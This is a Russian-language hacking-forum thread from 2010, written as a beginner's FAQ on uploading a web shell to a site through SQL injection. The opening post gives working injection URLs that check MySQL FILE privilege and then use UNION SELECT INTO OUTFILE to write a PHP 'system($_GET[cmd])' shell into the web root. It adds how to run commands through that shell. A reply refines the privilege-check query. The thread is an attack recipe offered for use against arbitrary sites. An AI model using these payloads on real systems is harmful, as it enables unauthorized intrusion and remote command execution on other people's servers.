Заливаем шелл через SQL-injection (File_Priv:Y)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Заливаем шелл через SQL-injection (File_Priv:Y) - 2010-03-29 23:58:56.340000
|
|
|
$r00tk1t$
Сообщений: 84
Оценки: 0
Присоединился: 2010-03-13 14:21:48.886666
|
Так сказать решил написать мини фак по заливке шелла через Sql-injection.
Прежде всего хочю сказать что данный F.A.Q. расчитан исключительно для новичков, знающие люди врятле для себя откроют что-то новое…
Прежде всего надо проверить наличие File_Priv (для этого должен быть фактически рут) на сервере:
quote:
http://site.com/index.php?id=99999+and+1=0+union+select+File_Priv,2,3,4,5,6,7+from+mysql.user–
если получем результат N то можно смело забить на этот сайт ;)
Если же Y, идём дальше….
Далее что бы залить шелл нам потребуется узнать полный путь к сайту, обычно при MySQL ошибке проскакикает полный путь, выглядит он приблизительно так:
quote:
/home/site.com/www/
После того как узнали путь, льём шелл ;)
quote:
http://site.com/index.php?id=99999+and+1=0+union+select+'<? system($_GET[cmd]); ?>,2,3,4,5,6,7+from+mysql.user+into+outfile+'/home/site.com/www/shell.php–
Переходим по адресу http://site.com/shell.php?cmd=phpinfo()
Если всё ок - видим php info сервера :)
Собственно вот и всё, если будут какие-то вопросы, для этого создана отдельная темка: http://forum.xakep.ru/m_978175/tm.htm
|
|
|
|
|
RE: Заливаем шелл через SQL-injection (File_Priv:Y) - 2010-03-30 01:09:06.246666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
http://site.com/index.php?id=99999+and+1=0+union+select+File_Priv,2,3,4,5,6,7+from+mysql.user–
таким запросом ты не узнаешь file_priv, если юзеров несколько (2 и больше)
правильный запрос для того, чтобы узнать file_priv:
http://site.com/index.php?id=99999+and+1=0+union+select+File_Priv,2,3,4,5,6,7+from+mysql.user+where+user= 'имя юзера'--+
Тема по своей несостоятельности и малой смысловой нагрузке переносится в форум для начинающих.
PS:
quote:
если получем результат N то можно смело забить на этот сайт
Да? ну-ну
|
|
|
|
|
RE: Заливаем шелл через SQL-injection (File_Priv:Y) - 2010-03-30 01:18:40.736666
|
|
|
MERRON
Сообщений: 456
Оценки: 312
Присоединился: 2009-05-05 12:42:29.883333
|
quote:
Да? ну-ну
И как по твоему действовать в таком случае?
|
|
|
|
|
RE: Заливаем шелл через SQL-injection (File_Priv:Y) - 2010-03-30 01:34:12.050000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
) По-другому
|
|
|
|
|
RE: Заливаем шелл через SQL-injection (File_Priv:Y) - 2010-03-30 02:44:15.700000
|
|
|
$r00tk1t$
Сообщений: 84
Оценки: 0
Присоединился: 2010-03-13 14:21:48.886666
|
dell
|
|
|
|
|
|
